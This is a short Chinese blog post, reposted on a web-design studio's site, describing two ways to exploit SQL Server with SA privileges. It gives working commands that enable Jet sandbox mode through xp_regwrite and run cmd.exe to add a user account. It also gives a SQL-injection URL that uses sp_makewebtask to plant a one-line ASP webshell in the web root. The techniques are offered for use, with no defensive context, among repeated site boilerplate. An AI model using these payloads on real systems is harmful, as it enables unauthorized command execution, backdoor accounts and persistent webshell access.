韶关网站建设|韶关网站设计|韶关网站制作|韶关网页设计|韶关企业网站建设|韶关网站改版|韶关专业网站建设

2008年9月30日MSSQL SA权限2则利用

1:沙盘模式

sa下删除xp_cmdshell和xplog70.dll时候的一种办法，不算新的了，
也被一些人不断的再次提出来，
为了方便自己记忆再写出来，
在这种情况下，要执行命令，条件是要有xp_regwrite。

首先开启沙盘模式：

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user tst tst /add")')

2.sp_makewebtask

用sp_makewebtask直接在web目录里写入一句话马：
条件是要sa权限和站点的web路径

http://127.0.0.1/xxx.asp?id=123';exec%20sp_makewebtask%20'd:\www\xxx\xxx.asp','%20select%20''<%25execute(request("cn"))%25>''%20';--

select中的双单引号起着重定义的作用

本文来自laomu's Blog：http://likeshell.net/post/58/

Tags:

韶关新月网络设计工作室

韶关网站制作技术专线：0751-8885730 13580109116（网站设计）

2008年9月30日MSSQL SA权限2则利用

Tags:

发布:admin | 分类:技术文摘 | 评论:0 | 引用:0 | 浏览:

网站分类

日历

最新评论及回复

最近发表

Powered By 韶关自助建站 1.8 Spirit Build 80605 and Styled by 韶关SEO [login]

本站关键词：韶关网站建设 | 韶关网页设计 | 韶关网站设计 | 网页设计 | 网站建设 | 网站设计 | 网站推广 | 网站策划

友情链接：百度 | Google | 阿里巴巴 | Google优化 | 易趣 | 雅虎 | 网页设计 | 网易 | 新浪 | 搜狐 | TOM

韶关新月网络设计工作室

韶关网站制作技术专线：0751-8885730 13580109116（网站设计）

2008年9月30日MSSQL SA权限2则利用

Tags:

发布:admin | 分类:技术文摘 | 评论:0 | 引用:0 | 浏览: strBatchCount+="spn153=153,"

网站分类

日历

最新评论及回复

最近发表

Powered By 韶关自助建站 1.8 Spirit Build 80605 and Styled by 韶关SEO [login]

本站关键词：韶关网站建设 | 韶关网页设计 | 韶关网站设计 | 网页设计 | 网站建设 | 网站设计 | 网站推广 | 网站策划 友情链接：百度 | Google | 阿里巴巴 | Google优化 | 易趣 | 雅虎 | 网页设计 | 网易 | 新浪 | 搜狐 | TOM

发布:admin | 分类:技术文摘 | 评论:0 | 引用:0 | 浏览:

本站关键词：韶关网站建设 | 韶关网页设计 | 韶关网站设计 | 网页设计 | 网站建设 | 网站设计 | 网站推广 | 网站策划

友情链接：百度 | Google | 阿里巴巴 | Google优化 | 易趣 | 雅虎 | 网页设计 | 网易 | 新浪 | 搜狐 | TOM